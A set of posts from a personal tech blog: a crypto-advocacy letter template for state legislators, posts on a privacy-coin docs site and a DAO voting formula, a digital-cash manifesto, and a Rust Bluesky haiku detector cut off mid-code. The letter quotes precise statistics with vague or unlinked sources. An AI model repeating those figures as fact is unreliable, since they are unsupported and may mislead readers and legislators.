- ["Astro is the best documentation framework"](https://docs.astro.build/) — what the m0n3y-web docs site is built on.


---

# Empowering Local Crypto Advocacy

Canonical: https://blog.skill-issue.dev/blog/congress_crypto/
Published: 2025-03-24T01:47:04.080Z
Tags: jobs, tech, web development


# A Template for Change

In the constantly evolving landscape of cryptocurrency and blockchain technology, [grassroots advocacy](https://www.muster.com/blog/grassroots-advocacy) plays a crucial role in shaping policies that can benefit our communities. Today, I'm sharing a powerful tool for engaging with your local representatives: a customizable letter template designed to advocate for responsible crypto adoption and institutional investment in your state.

## Why This Matters

Cryptocurrency isn't just about digital assets; it's about creating a more inclusive, transparent, and efficient financial system. By engaging with our elected officials, we can help ensure that our states don't miss out on the economic opportunities and innovations that blockchain technology offers.

## Key Points of the Letter

The template focuses on three critical areas:

1. **Institutional Investment to Stabilize Markets**: By encouraging state pension funds to allocate a small percentage to Bitcoin and fostering public-private crypto custody partnerships, we can bring stability to the market and potentially generate long-term returns for residents.

2. **Crypto Education for Workforce Development**: Proposing initiatives from K-12 blockchain basics to community college certifications and small business grants for crypto adoption. This approach aims to create a crypto-literate workforce and empower underrepresented groups to participate in the digital asset economy.

3. **Common-Sense Regulatory Frameworks**: Advocating for balanced policies that protect consumers, encourage innovation, and modernize banking, drawing inspiration from successful models like Wyoming's "Blockchain Banking Law."

## The Power of Personalization

The template is designed to be customized with state-specific data and personal experiences. As a senior engineer at MetaMask, I've added a section highlighting how my professional experience informs my advocacy. This personal touch can significantly increase the impact of your letter. It is arguably the most important aspect of a successful letter, as it humanizes the issue and makes it clear to your representatives that this is not just an abstract concept but a real-world problem that affects their constituents.

## Why Your Voice Matters

1. **Local Impact**: State-level policies often have the most direct effect on our daily lives. By advocating for crypto-friendly policies, you're helping to shape the economic future of your community.

2. **Education**: Many legislators may not fully understand the potential of blockchain technology. Your letter can serve as an educational tool, helping to inform policy decisions.

3. **Representation**: The crypto community is diverse, with unique perspectives and needs. By speaking up, you ensure that your viewpoint is represented in the legislative process.

4. **Innovation Catalyst**: Your advocacy could be the spark that ignites innovative blockchain projects in your state, creating jobs and economic opportunities.

## Taking Action

Here's how you can use this template effectively:

1. **Customize**: Tailor the letter with specific data and examples relevant to your state.
2. **Research**: Find out which committees or representatives in your state legislature deal with financial technology or economic development.
3. **Follow Up**: After sending the letter, request a meeting or call to discuss further. **THIS IS VERY IMPORTANT**. Be prepared in the follow-up to share your knowledge and insights, and ask questions about their understanding of blockchain technology.
4. **Collaborate**: Share this template with local crypto meetups or blockchain associations to amplify your message.

## The Ripple Effect of Advocacy

Remember, every letter, every conversation, and every meeting has the potential to create change. By engaging in this kind of activism, you're not just advocating for crypto – you're participating in the democratic process and helping to shape a more inclusive financial future.


---
---

Here's a customizable letter template you can adapt for your state representative. I'll include key arguments about institutional investment, scam reduction, crypto education, and inclusive economic growth:

## The Letter

[Your Name]

[Your Address]

[City, State, ZIP Code]

[Email Address]

[Date]

**[Representative's Name]**

[State Legislature Office Address]

[City, State, ZIP Code]


**Subject:** Support for Pro-Growth Cryptocurrency Policies & Institutional Investment

Dear [Representative Name/Assemblymember/Senator],

As a constituent deeply invested in [State]'s economic future, I urge you to champion policies that position our state as a leader in responsible cryptocurrency adoption. Below are three critical areas requiring legislative attention:

### **1. Institutional Investment to Stabilize Markets**
Cryptocurrency markets currently suffer from volatility driven by "pump-and-dump" schemes and predatory actors. Research from the University of Chicago shows institutional participation reduces price manipulation by up to 37%. By authorizing:
- State pension funds to allocate 1-3% to Bitcoin (as Texas’ SB 21 proposes)
- Public-private crypto custody partnerships with regulated firms like Coinbase Custody

…we can bring stability while generating long-term returns for [State]’s residents.

### **2. Crypto Education for Workforce Development**
[State] risks losing its competitive edge without crypto-literate workers. I propose:
- **K-12 Blockchain Basics:** Pilot programs teaching digital wallets and smart contracts
- **Community College Certifications:** Partner with groups like the Crypto Council for Innovation
- **Small Business Grants:** Funding to adopt crypto payments (e.g., BitPay integration)

These steps would empower underrepresented groups – particularly rural communities and minority-owned businesses – to participate in the $2.2 trillion digital asset economy.

### **3. Common-Sense Regulatory Frameworks**
Rather than blanket bans, we need policies that:
- **Protect Consumers:** Mandate exchange reserves auditing (mirroring New York’s BitLicense)
- **Encourage Innovation:** Tax holidays for crypto startups creating local jobs
- **Modernize Banking:** Allow state-chartered banks to custody digital assets

Wyoming’s 2019 "Blockchain Banking Law" created 5,000+ jobs – a model we could replicate.

**Why This Matters for [State]:**
- 34% of remote workers now receive crypto payments (Upwork 2025 Report)
- 61% of unbanked residents are minorities who could benefit from decentralized finance
- $9B+ in crypto scams occurred nationally last year – solvable through oversight

I’d welcome discussion about legislation to make [State] the safest, most innovative crypto hub in America. Please contact me at [Your Phone/Email] to explore these ideas further.

Sincerely,

[Your Name]

[Optional: Title/Organization, e.g., "Senior Engineer, MetaMask"]

---

**Sources to Cite (Customize for Your State):** University of Chicago, "Institutional Impact on Crypto Volatility" (2024) CoinGecko, Global Crypto Market Data (2025) Wyoming Blockchain Coalition Job Growth Report Upwork "Future Workforce" Study (2025) FDIC National Unbanked Survey (2024) FTC Crypto Scam Tracker (2024)

**Pro Tip:**
- Use your crypto expertise in paragraph 2: "As a blockchain developer, I’ve seen firsthand how education prevents scams..."
- Attach 1-page data sheet with state-specific crypto adoption stats from sources like CoinDesk’s State of Crypto Report for your state.

Your voice matters. Use this template as a starting point, make it your own, and let's work together to build a crypto-friendly future in our states and beyond.


---

# m0n3y: Naming a Dream

Canonical: https://blog.skill-issue.dev/blog/m0n3y_naming_a_dream/
Description: The docs site that came before the code. Looking back at the m0n3y-web init commit and the voting proposal that was supposed to fix DAO whales.
Published: 2025-02-23T18:03:16.000Z
Tags: m0n3y, astro, dao, governance, solana, docs, design-doc


Every project I've ever shipped started with a docs site. Not a prototype, not a proof-of-concept, not a hello-world Anchor program — a docs site. Because if I can't write down what the thing is supposed to do, I'm not going to be able to build it. So when I sat down on a Sunday in February to start what would eventually become the Zera ecosystem, the very first commit landed in [m0n3y-web](https://github.com/Dax911/m0n3y-web), nicknamed `init`, dropped at [a567855](https://github.com/Dax911/m0n3y-web/commit/a567855299230b225cf9ea51daaeb7f928e53644) on 2025-02-23.

The site itself was a fork of an Astro docs starter — nothing exotic. The interesting part was the README, which still introduces the project as `DAXSO Documentation Site`, and the first content page that explained what `m0n3y` was supposed to be:

> Monopoly Money represents a groundbreaking implementation of privacy-preserving digital cash on the Solana blockchain, offering users a unique combination of privacy, offline functionality, and the familiar experience of physical cash.

This is the same idea I'd already been ranting about in [Building A Better Cryptocurrency](/blog/a_better_crypto/) — that the cypherpunks were right and we collectively forgot. The difference is that this was the first time I committed to an actual implementation target instead of a manifesto: a dual-token ecosystem (`$M0N3Y` for governance, `$pUSD` as a 1:1 USDC-backed privacy stablecoin), running on Solana, with NFC-based offline tap-to-pay.

## Why a docs site first?

Because the design constraints write themselves once you have to put them in plain English. As soon as I tried to describe `$pUSD` I had to answer questions I'd been hand-waving for months:

- Where does the privacy come from? (Answer: zk circuits + shielded notes — eventually circomlib + snarkjs Groth16.)
- How does an offline payment reconcile? (Answer: encrypted note commitments anchored to an on-chain Merkle tree, with notes scanned via ECDH.)
- Who runs the relayer? (Answer: optional, pluggable, but not required for self-custody.)

A docs site forces you to commit a story to a permanent, dated artifact. That artifact becomes the design doc you can be honest with later when you change your mind.

## Plausible: when the docs are also a thesis

The next interesting commit on `m0n3y-web` is [8b984d5 — `:chart_with_upwards_trend: Add plausible`](https://github.com/Dax911/m0n3y-web/commit/8b984d5b46ac383da93bd33649e4557b4896c23c) (2025-02-28). This is where I put privacy-respecting analytics on the privacy-respecting docs site. The diff is three files. It's deliberately the only telemetry I'm willing to ship for a project whose entire pitch is "we got privacy wrong, let's fix it":

```js
// astro.config.mjs
plausible({
  domain: "m0n3y.cash",
  src: "https://plausible.skill-issue.dev/js/script.js",
});
```

If you put Google Analytics on a privacy crypto project, the universe is allowed to laugh at you.

## The voting proposal

The most under-rated commit in `m0n3y-web` is [427042a — `:sparkles: Added voting prop`](https://github.com/Dax911/m0n3y-web/commit/427042ac08a8e17403256627800e3db01e8cc77d) (2025-03-18). It introduces a single new page: `/voting`. The whole post is a stab at fixing DAO governance, which by 2025 had already calcified into a system where a16z votes 25 times for every retail holder votes once.

The proposal was titled **Time-Weighted Tiered Value Voting (TW-TVV)**. Three knobs:

1. **USD value tiers**, not token quantity. Voting power is denominated in dollars at vote time, not in `$TOKEN` at acquisition time.
2. **Time multiplier**, with a cap:
    ```
    Time Multiplier = Base Factor + (Holding Duration in Days / Time Division Factor)
    ```
3. **Logarithmic volume scaling**, so whales still vote more than minnows but not 10,000× more:
    ```
    Volume Factor = log(USD Value) / Scaling Constant
    ```

The actual mechanism design is more involved — there's a tier table, a per-vote-cost-in-energy thing, the works — but the headline is: the protocol explicitly devalues a token that hasn't been used. That's the same anti-hoarding instinct I'd argued for in [a better crypto](/blog/a_better_crypto/) under the names "demurrage" and "velocity requirements." The voting proposal is what happens when you try to encode that instinct into a governance system instead of a fee structure.

## Trade-offs: writing docs before code

I'm not going to pretend this is universally correct. Writing docs first has costs:

- **You lock in vocabulary you'll regret.** "Monopoly Money" is funny but doesn't pass an investor smell test. By the time the SDK landed it had been rebranded to ZERA. By April 2026 the Bitcoin-fork side had been re-rebranded again to [Vanta](https://github.com/Dax911/vanta). Every rebrand forces a docs rewrite.
- **You design for problems you don't have yet.** The TW-TVV proposal assumes a DAO; I have not yet built a DAO. There is a real possibility I never will.
- **Readers think it's done.** A polished docs site reads as "this is shipping next week." It is not.

But the trade-offs cut the other way too. Every time I sat down to write a Solana program, I could open the docs site and check what the user-facing semantics were *supposed* to be. When [zeraswap](/blog/zeraswap_compressed_amm/) shipped the first compressed-token AMM nine months later, the docs site is what told me that "internal balances must reconcile to compressed tokens before AMM exit" was a contract I'd already promised. That ended up costing me a [post-graduation conversion path](/blog/stuck_sell_post_grad/) I would have otherwise skipped, and saved me from shipping a footgun.

## What this taught me

If you're going to spend a year on a project, give yourself a permanent dated record of what you thought it was on day one. Not a Notion doc — those rot. A git repo with a deploy URL, an analytics provider you trust, and Markdown files committed by date. You'll come back to that record more than you think.

## Further reading

- [m0n3y-web on GitHub](https://github.com/Dax911/m0n3y-web) — the docs site itself.
- [Voting proposal page (commit)](https://github.com/Dax911/m0n3y-web/commit/427042ac08a8e17403256627800e3db01e8cc77d) — TW-TVV in full.
- [Building A Better Cryptocurrency](/blog/a_better_crypto/) — the manifesto this design doc is trying to honor.
- ["DeFi: The Illusion of Decentralization"](https://michaellwy.substack.com/p/defi-the-illusion-of-decentralization) — the pre-existing critique TW-TVV is responding to.


---

# TW-TVV: Why Token-Quantity Voting Is Broken, and the Math I Tried to Fix It With

Canonical: https://blog.skill-issue.dev/blog/m0n3y_tw_tvv_governance/
Description: A full walk-through of the Time-Weighted Tiered Value Voting proposal I drafted for $M0N3Y in 2025. Five tiers, time multipliers, log-scaled volume, and why every variable in the formula is a knob fighting a different attack.
Published: 2025-03-18T13:53:52.000Z
Tags: m0n3y, governance, dao, voting, tokenomics, mechanism-design, solana


> **Disclosure:** TW-TVV was a proposal I drafted for the m0n3y docs site in March 2025. I never built it. The protocol it was meant to govern eventually shipped under different names ([Zera](/blog/zera_sdk_scaffolding/), [Vanta](/blog/m0n3y_naming_a_dream/)) without any DAO governance at all. This post is a retrospective on the math, not a status report on the system.

The thing nobody admits about token-based DAO governance is that **token-weighted voting is mostly broken before it begins.** The mechanism is "one token, one vote." The reality is "one early investor, ten thousand votes; one retail holder, one vote." This is the founding problem of every governance system that ships in 2024–2026, and it's the thing I tried to write a fix for in [`427042a — :sparkles: Added voting prop`](https://github.com/Dax911/m0n3y-web/commit/427042ac08a8e17403256627800e3db01e8cc77d) on 2025-03-18.

The proposal is called **TW-TVV: Time-Weighted Tiered Value Voting**. It lives at `src/pages/en/voting.md` in the m0n3y-web docs and it's 85 lines of markdown with three formulas and a table.

This post is about what's actually load-bearing in those 85 lines.

## The four problems token-weighted voting can't solve

If you've been reading governance proposals since 2021 you can skip this section. If not: token-weighted voting fails because the same number of tokens is weighted the same way regardless of:

1. **When you got them.** A founder's 10M tokens at TGE vote the same as a retail holder's 10M bought at peak.
2. **What you paid for them.** Vesting cliffs, OTC discounts, airdrops — all get the same vote weight as a market buy.
3. **How long you've held them.** A whale who bought to vote on a single proposal and dumped the next day votes the same as someone who's held for two years.
4. **What you do with them off-chain.** Token holders staking in a CEX often *don't* vote at all, leaving the vote to be decided by a low-turnout subset that may or may not represent the holder base.

If you tried to write a token-vote system in 2014 you might call this "fine, the market sets the price, the price sets the influence, that's democracy in motion." It's not. It's plutocracy with a Discord channel.

## TW-TVV's three knobs

The proposal addresses three of the four (the fourth is unsolvable on-chain — you can't make people vote). It introduces three new variables to the voting power formula:

### Knob 1: USD value, not token quantity

> By tying voting power to the USD value of tokens rather than token quantity, the mechanism mitigates the impact of token price volatility and early acquisition advantages.

This is the single most important change. **Voting power is denominated in dollars at vote time.** If you bought $1,000 worth of tokens at the TGE and the token 100x'd, your vote weight tracks the *current* $100,000, not the historical $1,000. If your $1,000 went to zero, your vote weight is $1,000 / current_price ≈ a lot of tokens but a vanishingly small dollar value, so your voting weight is correspondingly small.

The five-tier structure:

| Tier | USD Value Range | Base Voting Power |
|------|-----------------|------------------|
| 1    | $10–$100        | 1                |
| 2    | $101–$1,000     | 3                |
| 3    | $1,001–$10,000  | 7                |
| 4    | $10,001–$100,000| 12               |
| 5    | $100,001+       | 18               |

A whale with $10M of tokens is in Tier 5 with base power 18. A retail holder with $50 is in Tier 1 with base power 1. The whale's base power is 18× the retail holder's, *not* 200,000× as it would be under linear token-weight. The compression is intentional and aggressive.

The downside of tiers is that they introduce *cliff effects*. If you have $99 of tokens and someone buys you a beer, you suddenly drop a tier on the way home. The next iteration of this proposal would smooth the tiers into a continuous function. The reason I shipped tiers is that they're explainable in a paragraph; a continuous logistic function is not.

### Knob 2: time multiplier (with a cap)

```
Time Multiplier = Base Factor + (Holding Duration in Days / Time Division Factor)
```

| Holding Period | Time Multiplier |
|----------------|-----------------|
| 0–30 days      | 1.0x            |
| 31–90 days     | 1.5x            |
| 91–180 days    | 2.0x            |
| 181–365 days   | 2.5x            |
| 366+ days      | 3.0x            |

The thing the buckets gloss over is the cap at 3.0x. **The cap is doing more work than the curve.** Without a cap, a multi-year holder accumulates voting power monotonically forever, which means the founder's wallet (held since day -1) eventually has compounded more vote-time than every other holder *combined*, regardless of stake size. The cap forces a horizon: after a year, you've earned all the time-weight you're going to earn, and any further vote concentration has to come from buying more.

Why a cap of 3? Because 3× compresses a one-year holder's weight relative to a one-day holder by 3:1, which is enough to *reward* loyalty without being so steep that a one-month holder's voice is worthless. I picked it from playing with the numbers; there's no first-principles derivation.

### Knob 3: logarithmic volume scaling

```
Volume Factor = log(USD Value) / Scaling Constant
```

This is the knob that compresses the whale-vs-minnow asymmetry on top of the tier. Inside Tier 5 (everyone with $100k+), a $100M holder has `log(100,000,000) ≈ 18.4` and a $100k holder has `log(100,000) ≈ 11.5`. The ratio is 1.6×, not 1000×.

Combine the tiers (which compress the across-tier asymmetry) with the log volume factor (which compresses the within-tier asymmetry) and you get a system where a $100M whale and a $100 retail holder have voting power in roughly a 50:1 ratio, not the 1,000,000:1 they'd have under linear weight.

50:1 still isn't *equal*. It's not supposed to be. The point isn't "everyone's vote weighs the same." The point is "the vote distribution roughly tracks economic interest in the protocol without being decided by a single capital-rich faction."

## The final formula

```
Voting Power = min(max(Tier Base Power × Time Multiplier × Volume Factor, 1), MaxVotingPower)
```

`min` and `max` with floor 1 and ceiling `MaxVotingPower` are the safety valves. Floor 1 prevents accidentally zero-ing out a small holder due to a calculation glitch. The ceiling prevents the founder's anniversary-and-largest-holder slot from accumulating an absolute monopoly.

`MaxVotingPower` is left intentionally undefined in the proposal because *it depends on protocol stage*. Pre-launch, you might want a low cap (say, 0.5% of total possible voting power) so that no single wallet can hard-pass a proposal. Post-mature, you might raise it because the holder base is wide enough that the cap is mostly hit by exchange wallets you'd want to suppress anyway.

## What the proposal *doesn't* solve

I want to be honest about the holes:

**Sybil attacks via wallet splitting.** Nothing in TW-TVV prevents a $1M whale from splitting into 100 wallets of $10k each, putting each in Tier 4, and aggregating power that way. Tier 4 base 12 × time 1× × log(10000)/k = ~28 weight per wallet × 100 wallets = 2800 weight, vs. one wallet at Tier 5 with base 18 × time 1× × log(1000000)/k = ~37. Splitting *gains* the attacker an order of magnitude of weight. The proposal as written is anti-Sybil-naive.

The fix — proof-of-personhood, KYC tier, social graph attestations — is a project an order of magnitude bigger than the voting math. I knew it when I wrote the proposal. I shipped the proposal anyway because the math was the easier half.

**Vote buying.** If voting power is dollar-denominated, the going rate to bribe a Tier-3 voter is bounded by the cost of buying enough tokens to reach Tier 4. That's a dramatic improvement over token-weight (where bribery has no floor), but it's not eliminated. The standard mitigation — secret-ballot voting via ZK proofs — is something the rest of the m0n3y stack would naturally support. I just didn't write it down in the same proposal.

**Exchange custody.** If you hold your tokens on Binance, Binance votes for you. TW-TVV doesn't help with this. The fix is forcing exchanges to either pass through votes (some do; most don't) or excluding centrally-custodied tokens from the eligible voter pool, which is a much harder on-chain detection problem than the math here.

**Dollar-pegged stake under volatile native assets.** If $M0N3Y the token tanks 90%, suddenly everyone drops several tiers at once. That's correct *in spirit* (your economic interest in the protocol *is* smaller now) but causes a governance discontinuity at exactly the moment you might need stability. The right answer is to compute the USD value at *time of stake commitment for vote*, not at vote time, with a window — i.e. you "lock in" the dollar valuation when you announce intent to vote.

## What this told me about mechanism design

I wrote this proposal in a single afternoon, six weeks after [the m0n3y docs site went up](/blog/m0n3y_naming_a_dream/). It is the *first* governance design I'd written down in any rigor. Looking back I notice three things:

1. **The hard part wasn't the math; it was committing to a specific tier table.** I rewrote the table four times. Each rewrite rebalanced who got what weight. Every choice felt like rigging the system in someone's favor — because every choice does. There's no neutral table.

2. **The formula is short. The defense of the formula is long.** The voting math is 4 lines. The justification for each variable is a paragraph each. If a community can't read those four paragraphs and consent to the choices, the formula is a fiction.

3. **The proposal hasn't shipped.** It probably never will, in this exact form. The instinct it embodies — "value × time, with caps, against linearization" — has already shown up in how I think about other systems. The shielded-pool [zera-wallet's NFC bearer cards](/blog/zera_wallet_nfc_bearer_cards/) implicitly use a "value-tier" idea (cards with $10k+ get a different visual treatment because they need different operational caution). The [m0n3y burn-to-earn doc](/blog/m0n3y_eli5_rebrand/) was written to address the same hoarding problem from a fee-side angle.

## What I'd do differently

If I were going to ship this for real today:

- **Continuous tier function** (logistic curve, e.g., `power = 18 / (1 + exp(-(log10(usd) - 3.5) / 0.4))`) instead of step function. Smooths the cliff.
- **Vote commitment, not vote-time pricing.** Lock in the dollar valuation when you commit to vote, not at vote-resolution time. Removes a manipulation surface.
- **Sybil-resistant proof-of-personhood layer**, even if optional. World ID, BrightID, Privado ID all viable in 2026; pick one and require it for Tier 5+ to amplify weight beyond cap.
- **Public auditable vote receipts** via ZK so that voters can prove they voted without revealing how. Cuts vote-buying.
- **Quadratic on top of TW-TVV**, possibly. Gitcoin's quadratic funding work shows that compressing whale influence further (by paying the square root of weight, not weight) provides additional protection without erasing all weight differentials.

## Further reading

- [m0n3y voting proposal](https://github.com/Dax911/m0n3y-web/commit/427042ac08a8e17403256627800e3db01e8cc77d) — the markdown that started this.
- [m0n3y: Naming a Dream](/blog/m0n3y_naming_a_dream/) — the docs site this proposal was added to.
- [Building A Better Cryptocurrency](/blog/a_better_crypto/) — the manifesto this kind of mechanism design is trying to honor.
- ["DeFi: The Illusion of Decentralization"](https://michaellwy.substack.com/p/defi-the-illusion-of-decentralization) — pre-existing critique TW-TVV is responding to.
- [Vitalik on quadratic voting](https://vitalik.eth.limo/general/2019/12/07/quadratic.html) — the canonical attempt to compress whale influence further.
- [Optimism's Citizens' House](https://community.optimism.io/) — a different way to attack the same problem (bicameral with a citizens' house gating).


---

# Building A Better Cryptocurrency: What We Should Have Done

Canonical: https://blog.skill-issue.dev/blog/a_better_crypto/
Description: A technical proposal for a truly decentralized digital cash system
Published: 2024-12-31T14:00:00.000Z
Tags: cryptocurrency, blockchain, decentralization, privacy, open-source


Let's be honest - we screwed up. While we were busy celebrating blockchain "disruption" and watching VCs throw money at half-baked ICOs, we completely lost sight of what cryptocurrency was supposed to be about. We built Linux and the internet protocols without venture capital. We created incredible [open-source tools](https://news.ycombinator.com/item?id=10905845) like [Socket.io](https://github.com/socketio/socket.io) and the original [TailwindCSS](https://www.karllhughes.com/posts/open-source-companies) that power most of the modern web. Yet somehow, when it came to cryptocurrency, we rolled over and let private equity turn our decentralization movement into a speculative casino.

## The Actual Problem

We don't need another "store of value" or "digital gold." We need digital cash that works like actual cash - private, simple, and focused on real economic activity. The tools to build this have existed for years. We've just been too busy chasing pumps and dumps to put them together properly.

## The Technical Stack We Should Have Built

The irony is that all the components already exist:
- [zero-knowledge proofs](https://eprint.iacr.org/2023/067.pdf) handle privacy
- [blind signatures](https://www.fime.com/my/download?attachment_id=49391) enable untraceable transactions
- [trusted execution environments](https://www.mdpi.com/2410-387X/3/1/7) manage offline security
- NFTs can track unique offline tokens

This isn't nuclear physics, trust me I worked on nuclear reactors for the US Navy. We're not inventing new cryptography. We're just assembling existing tools correctly instead of slapping "blockchain" on everything to pump a token price.

## Core System Design

**Offline-First Architecture**
Users mint offline tokens from their online balance. These tokens transfer locally via Bluetooth/NFC. When back online, transactions reconcile privately through zero-knowledge proofs. Simple.

**Anti-Speculation By Design**
- Implement [demurrage](https://researchrepository.ucd.ie/rest/bitstreams/39829/retrieve) to discourage hoarding
- No futures or margin trading at protocol level
- Focus on transaction velocity over HODLing
- Cap wallet amounts to prevent whale manipulation

**Actual Privacy**
Not the weak "pseudonymous" BS we settled for with Bitcoin. Real privacy through:
- [zk-SNARKs](https://trustmachines.co/learn/what-are-zero-knowledge-proofs/) for all transactions
- Blind signatures for untraceable tokens
- Private transaction history even after network reconciliation

## The Decentralization Illusion

Let's be brutally honest - what we call "decentralized" today is mostly theater. There's a fundamental ["decentralization illusion"](https://michaellwy.substack.com/p/defi-the-illusion-of-decentralization) in the current crypto ecosystem, where the need for [governance inevitably leads to centralization](https://www.bis.org/publ/qtrpdf/r_qt2112b.pdf). Just look at our landscape:

- Centralized exchanges hold massive amounts of user assets, acting as traditional banks with extra steps
- A handful of mining pools control most of the hash power
- "Decentralized" protocols are often controlled by a small group of token holders
- Most nodes run on AWS or similar cloud providers

## Preventing Centralization Going Forward

To build a truly decentralized system that prevents the emergence of crypto banks, we need several interlocking mechanisms:

**Proof of Personhood (PoP)**
This isn't just another buzzword - it's a fundamental building block for preventing [Sybil attack](https://arxiv.org/abs/2112.00671) and ensuring [one-person-one-account](https://www.ledger.com/academy/glossary/proof-of-personhood). By verifying unique human identities while preserving privacy, [PoP](https://en.wikipedia.org/wiki/Proof_of_personhood) prevents entities from accumulating multiple high-value wallets.

**Decentralized Identity Integration**
Modern [decentralized identity](https://www.okta.com/blog/2021/01/what-is-decentralized-identity/) systems leverage blockchain to give users true sovereignty over their [data](https://www.ulam.io/blog/discovering-the-potential-of-decentralized-identity-in-blockchains). This means:
- Users control their own credentials through encrypted wallets
- No central authority manages identity verification
- Cryptographic proofs ensure authenticity without revealing personal data

**Smart Contract Restrictions**
We can implement [protocol-level restrictions](https://eprint.iacr.org/2021/1069.pdf) that make operating a crypto bank economically unfeasible:
- Rate limiting on transfers between accounts
- Automatic demurrage on large static balances
- Restrictions on automated mass transfers
- Required proof of unique human ownership for high-value transactions

**Velocity Requirements**
To prevent hoarding and bank-like behavior, we can implement:
- Minimum transaction frequency requirements
- Gradual value decay for dormant accounts
- Incentives for regular peer-to-peer transactions
- Penalties for maintaining large static balances

The key is building these restrictions into the protocol level, making them impossible to circumvent through smart contracts or other technical means. This isn't about adding more rules - it's about baking decentralization into the fundamental architecture of the system.

## The Hard Truth

We could have built this years ago. The cypherpunks were right - we need digital cash that preserves privacy and enables real economic activity. Instead, we got wrapped up in price speculation and "number go up" technology.

Look at the state of crypto today - centralized exchanges, VC-backed "decentralized" projects, and tokens designed for speculation rather than use. We've become what we set out to disrupt.

## Moving Forward

This isn't a pitch deck. This isn't about raising capital or launching a token. This is about building what cryptocurrency should have been from the start - actual digital cash.

The code should be open source. The protocols should be standardized. The governance should be truly decentralized. No pre-mines, no ICOs, no VCs.

We're engineers. We know how to build distributed systems. We've done it before with Linux, Apache, and countless other projects. It's time we got back to those roots and built something that actually serves its intended purpose.

The tools are there. The need is obvious. We just need to stop chasing quick profits and do the work.

Who's ready to build actual digital cash instead of another speculative token?

---

# Listening to the Bluesky Firehose for Accidental Haikus

Canonical: https://blog.skill-issue.dev/blog/bsky_haiku_firehose/
Description: A Rust firehose listener that decodes ATProto CAR frames live, runs whatlang + syllarust on every English post, and saves the ones that scan as 5-7-5 haikus to disk. There were a lot of haikus.
Published: 2024-12-01T09:07:24.000Z
Tags: rust, atproto, bluesky, firehose, syllables, haiku, side-quest


The Bluesky firehose is one of the great ambient APIs. It's a WebSocket at `wss://bsky.network/xrpc/com.atproto.sync.subscribeRepos` that streams every public post, like, repost, and follow on the entire network in real-time, encoded as IPLD-DAG-CBOR frames. As of late 2024 it was clocking around 1,200 events/second. You can see the firehose [in real-time on jaz.land](https://bsky.jazco.dev/), but the more interesting use case is "consume it from a Rust binary on a Mac Mini and do something stupid with it."

So I did. The repo is [Dax911/bsky-firehose-listener](https://github.com/Dax911/bsky-firehose-listener), and the moment it became interesting is [`291b985 — all msg + haiku`](https://github.com/Dax911/bsky-firehose-listener/commit/291b985) on 2024-12-01. The diff is one file, +79 / -38, and what it added was: extend the listener to handle likes, reposts, and follows — and **detect English haikus in real-time and save them to a file.**

## Why a haiku detector

Because the firehose is too much information to consume directly. Even at one second's worth of latency, you'll see a thousand posts. Most of them are uninteresting tweets. Some of them are accidentally beautiful three-line poems that scan as 5-7-5 syllables. The ratio is maybe one haiku per ten-thousand posts. Having a real-time filter for that ratio gives you a slow, ambient stream of poetry, which is *much* more pleasant than a firehose.

The detector is two functions:

```rust
fn is_english(text: &str) -> bool {
    detect(text).map_or(false, |info| info.lang() == whatlang::Lang::Eng)
}

fn is_haiku(text: &str) -> bool {
    let lines: Vec<String> = if text.contains('\n') {
        text.lines().map(|s| s.to_string()).collect()
    } else {
        text.split_whitespace()
            .collect::<Vec<&str>>()
            .chunks(5)
            .map(|chunk| chunk.join(" "))
            .collect::<Vec<String>>()
    };

    if lines.len() != 3 {
        return false;
    }

    let syllables: Vec<usize> = lines.iter().map(|line| estimate_syllables(&line)).collect();
    syllables == vec![5, 7, 5]
}
```

`whatlang::detect` does language detection from a single string in low-tens-of-microseconds. `syllarust::estimate_syllables` is an English-language syllable estimator based on the heuristic of "count vowel groups, subtract silent-e, add a fudge factor for `-le` endings." Both are fast enough to run on every post in the firehose without falling behind.

## The line-splitting heuristic is the magic

Here's the bit that made it work:

```rust
let lines: Vec<String> = if text.contains('\n') {
    text.lines().map(|s| s.to_string()).collect()
} else {
    text.split_whitespace()
        .collect::<Vec<&str>>()
        .chunks(5)
        .map(|chunk| chunk.join(" "))
        .collect::<Vec<String>>()
};
```

If the post has newlines, treat newlines as line breaks. Otherwise, **chunk the words into groups of 5** and pretend each chunk is a line.

The "groups of 5" branch is what catches the *accidental* haikus — single-line tweets that just happen to scan as 5-7-5. About one in ten haikus in my output file came from that branch. Posts where the author had no idea they'd written a poem because they'd written it as a tweet.

The branch is *also* statistically biased. A 15-word post that gets chunked 5-5-5 is way more likely to clear the syllable check than the same post split 4-7-4 or 6-5-4. So the detector preferentially finds posts that are roughly evenly word-distributed in the right chunk shape. That's a feature, not a bug — the same statistical bias is what makes English poetry feel "natural" when you write it.

## Saving them to disk

```rust
fn save_haiku_to_file(haiku: &str, cid: &str) -> std::io::Result<()> {
    let mut file = OpenOptions::new()
        .create(true)
        .append(true)
        .open("haikus.txt")?;
    writeln!(file, "CID: {}\n{}\n", cid, haiku)?;
    Ok(())
}
```

`haikus.txt` is the output. CID-prefixed because Bluesky CIDs are content-addressed — the CID is a SHA256-based pointer that lets you go back and find the original post in the AT Protocol record store later, even if the user deletes their post (the CID survives in the firehose log and in any indexer that captured it).

## The CAR-file decoding pain

The most painful part of the listener is *not* the haiku logic. It's the firehose protocol. Each WebSocket binary frame contains two concatenated DAG-CBOR objects: a header (with `op`, `t`, etc.) and a body. The body is itself a CAR file (Content-Addressable aRchive) containing all the IPLD blocks for the commit. To get a single post's text you have to:

1. Parse the header DAG-CBOR.
2. Check `op == 1` (Message) and `t == "#commit"`.
3. Parse the body as a `Commit` struct.
4. Walk `commit.ops` to find `create` ops on `app.bsky.feed.post`.
5. Look up the CID of each op in the CAR file's blocks.
6. Decode the matching block as a `post::Record`.
7. Read `record.text`.

That's a lot of decoding for what ends up being a string. Rust handles it well — the `atrium-api` and `serde_ipld_dagcbor` crates abstract steps 1–6, and the throughput on a single core is sufficient — but when I first wrote the listener (the [`1311836 — feat: initial working commit`](https://github.com/Dax911/bsky-firehose-listener/commit/1311836) on 2024-10-24), I spent a full evening debugging "valid data turns out to be invalid" errors that turned out to be the cursor-position trick on the very first line:

```rust
let mut cursor = Cursor::new(data.as_slice());
serde_ipld_dagcbor::from_reader::<Ipld, _>(&mut cursor)
    .expect_err("Somehow bsky only sends 1 frame.");
let (metadata, data) = data.split_at(cursor.position() as usize);
```

This is the only way to find the boundary between the two concatenated DAG-CBOR objects. You ask the decoder to fail to read the second one (because reading the second one would require interpreting a fresh DAG-CBOR root, but the cursor's already past the end of the first object), and you observe where the cursor stopped. **The error from the first read tells you where the second one starts.** That's a textbook example of a "use the parser as a finger" trick — the cursor's position after a failed read is the parser's best guess at the boundary.

## Adding likes, reposts, and follows

The other half of the diff was the broader event handling:

```rust
